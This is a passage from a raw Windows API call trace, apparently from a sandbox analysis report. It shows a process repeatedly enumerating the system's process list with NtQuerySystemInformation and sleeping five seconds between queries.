RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.830] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.853] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.869] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.876] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.883] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.890] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.897] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.904] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.915] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 